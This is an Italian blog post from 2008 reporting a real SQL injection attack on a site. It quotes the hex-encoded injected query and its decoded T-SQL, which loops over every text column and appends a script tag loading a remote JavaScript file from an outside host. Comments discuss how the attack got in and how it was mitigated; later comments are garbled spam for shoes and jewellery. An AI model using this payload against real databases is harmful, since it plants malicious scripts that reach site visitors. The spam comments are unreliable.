...SQL Injection....

Ciao, per un mio conoscente affetto da SQL Injection (effettuavano degli update su una tabella), ci siamo accorti che eseguivano operazioni del tipo :

SELECT * FROM xxxx where id=31786;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E75706461746561642E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);

Analizzando la stringa in binario,

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.updatead.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Ciao Massimiliano

Print | posted on mercoledì 18 giugno 2008 10.14

Comments on this post

# re: ...SQL Injection....

Requesting Gravatar...
Sono stati fin gentili. Potevano fare una bella drop delle tabelle o di tutti i db su quel server ;-)
Left by Raffaele Rialdi on giu 18, 2008 10.39

# re: ...SQL Injection....

Requesting Gravatar...
ma da dove li inserivano?

iniziavano con una cosa del tipo:
%%" -- SELECT * FROM ...?
Left by spleen2060 on giu 18, 2008 11.12

# re: ...SQL Injection....

Requesting Gravatar...
L'attacco è arrivato anche alle applicazioni in deploy nella DMZ della mia azienda. Il tutto è stato risolto a livello di IDS, ma fortunatamente ad ogni modo tutte le applicazioni avevano la QueryString blindatissima :) (W SDL ;)).
Da quanto ho potuto vedere, è ormai un attacco che ha seminato vittime un po' ovunque.
Ciao
Left by Dario Santarelli on giu 18, 2008 10.50

# re: ...SQL Injection....

Requesting Gravatar...
Preso anche io... però il drop non potevano farlo visto l'utente con i previlegi ristretti (datareader e datawriter però ce li ha.... sigh... sito in asp del 2001 senza stored :( ).
Altrimenti, sui siti sventurati che girano come sa, di solito fa anche un dump del filesystem e lo spedisce via email a non so che indirizzo.. per farci non voglio sapere cosa :D
Left by Alessandro Ghizzardi on giu 20, 2008 10.39

# [Daily Issue] Sql Injection, ASP classic, e la storia

Requesting Gravatar...
[Daily Issue] Sql Injection, ASP classic, e la storia
Left by NeatCoding on giu 21, 2008 11.37

# re: ...SQL Injection....

Requesting Gravatar...
Wonder comprende vinto la vostra sfida lecito sostenere copyright degli eroi benefico pubblicazione di fumetti come Spider-Man e Hulk eccezionale., mbt scarpe La società ha citato in giudizio gli amici e la famiglia reale del tardo co-creatore di Jack Kirby lo scorso anno, una volta impostato rivendicare i diritti d'autore per aiutare il vostro cane lavoro fatto dal 1958 per 1963. Tuttavia un innovativo York valutare deciso di Kirby disegni associati con tipi di carattere analogo a Male ferro piatto è stato stabilito "in affitto"., MBT Kisumu uomo una sorta di avvocato per la casa Kirby caratteristiche menzionati possono attirare il vostro giudizio.
Left by MBT Scarpe on lug 30, 2011 5.04

# bottes ugg、bottes hommes、Bottes Femmes

Requesting Gravatar...
Le storyplot concernant REM est dans de nombreuses approches concernant l'intrigue option sont fous l'intérieur des États-Unis,. bottes 2011 , qu'ils viennent de suite dans les Eighties rapide à travers l'institution d'une station de radio paysage - Scrappy en plus lo-fi, abrasifs néanmoins dans quelques beaux - floraison directement dans bona fide stade-charges exclusivement dans la santé 2ème décade de leur profession. "Nous avons été votre groupe de musiciens qui a acquis à zéro vise,« Michael Jordan Stipe a informé le réel BBC tôt cette saison de vacances, même si la publicité 15e REM avec l'album concept final. Dans le recul, il montrait de laquelle il ou elle était tout simplement en elle-même. Ce nombre - Stipe, le musicien Peter Dollar, le bassiste Mike Génératrices avec Berry charge batteur - gamed les premiers concerts dans l'église sur quelques Septembre 1980,. Tous Les Produits , que la nuit ils étaient néanmoins connu comme Twisted Kites, et donc ils joue un assortiment de contenus primaires ainsi que des couvertures, telles que la bonté du Pistols faire l'amour "Passez moins de le Double particulier avec Roadrunner Jonathan Richman. «Il semblait être vraiment intéressant», Stipe a rapporté plus tard », mais je n'essaie pas de se souvenir de la finale de 50 pour cent avec cela.", bottes ugg , la ville compacte
Left by kezhiqiangke on set 24, 2011 8.10

# hogan scarpe

Requesting Gravatar...
In this modern and fashionable society, people are pursuing for ugg boots sale cool, unique, stylish and innovative. Whether it is ugg boots for cheap or fashion accessories all means a lot for modern society of today. Same is the case with trendy looking hogan scarpe. When these are scarpe hogan, the excitement just gets doubled. Most chic looking hogan sito ufficiale are in fashion now. These are one of the favorite fashion accessories for men and women long time ago. If you have not yet tried collezione hogan, These are just brilliant and fabulous hogan outlet. They are most iconic and can provide you with a new feeling and enhance confidence. The quality of sito hogan is just superior to what you have dreamt of. Today owning a new and trendy looking pandora jewellery are not only meant for the wealthy people. These are now made luxurious and affordable pandora jewellery uk to reach out to every budget and range. You can just enjoy them by ordering pandora online where you get the complete satisfaction and genuine quality at best possible rates. The finish, quality and designs you get from pandora sale are really astonishing and you will love them all. Different styles and designs of pandora charms sale uk are now available to make your wrist beautiful. You can choose from the wide variety of juicy couture sale by comparing lots of perfect and stunning pieces. These cheap juicy couture would be nice investments for you in long term. These juicy couture tracksuits are brilliant and prove to be wonderful for you while it makes you stand out of the crowd.
Left by hogan scarpe on nov 08, 2011 7.26

# re: ...SQL Injection....

Requesting Gravatar...
No formal fees come going to be brought toward the student&nbsp;windows 7 key &nbsp;s, who insisted they do certainly nothing wrong.

&nbsp;nike outlet &nbsp;Parliamentary electi&nbsp; burberry outlet online &nbsp;ons are arranged to begin on Monday and &nbsp;Coach outlet online&nbsp;Tantawi pledged th&nbsp;moncler jacken outlet&nbsp;e polls would&nbsp;Juicy couture outlet &nbsp; go forward as planned. &nbsp;gucci outlet online &nbsp;Bu&nbsp; gucci outlet &nbsp;t an extrao&nbsp;Hermes birkin &nbsp;rd&nbsp; karen millen outlet &nbsp;inary offe&nbsp;tiffany and co outlet &nbsp;r of opposition l&nbsp;mac cosmetics outlet &nbsp;eaders believe that for getting &nbsp;Beats by dr dre &nbsp;progressively doubtful.

In an extra apparent conc&nbsp; karen millen dress &nbsp;ession to demons&nbsp;moncler jacken &nbsp;trators, the army council earlier issued a law that bans anybody convicted of corruption from operating&nbsp;ray ban sunglasses &nbsp; for busine&nbsp; links of london charms &nbsp;ss o&nbsp;gucci outlet online &nbsp;ffice or holding a federal government
Left by KK on nov 24, 2011 10.57

# re: ...SQL Injection....

Requesting Gravatar...
moncler vendita 1994 outdoor sports apparel since the door is opened, they were wearing more and more in more places. From 94 to 98 years Piumini Moncler Become the European region and the world's most famous retailers, only in Italy, Japan, Germany, Australia, Switzerland, United Kingdom, Sweden, Norway, Denmark or exercise those boutiques to buy Moncler boutiques known for something. But what really makes the brand or to re-count in 1998 under the pepper industry last FinPart Group initiatives. Continuation of the previous strategic restructuring plan, in support of head office FinPart Moncler to develop more product lines, give full play to the potential value of the brand. The TV ads that appear born in the mountains, living in the city's image has become a classic. Moncler's padded jacket as the cold season, when skiing or in the elegant occasions recognized the essential Moncler Outlet2
Left by moncler vendita on gen 13, 2012 9.53

# Jordan Shoes

Requesting Gravatar...

555linli6
I’ve never any pity for conceited people, because I think they carry their comfort about with them
Left by Jordan Shoes on feb 01, 2012 7.29

Your comment:

 (will show your gravatar)
 
Please add 8 and 5 and type the answer here: